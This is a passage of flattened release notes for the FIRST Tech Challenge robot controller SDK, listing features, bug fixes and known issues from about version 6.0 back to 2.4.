regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, 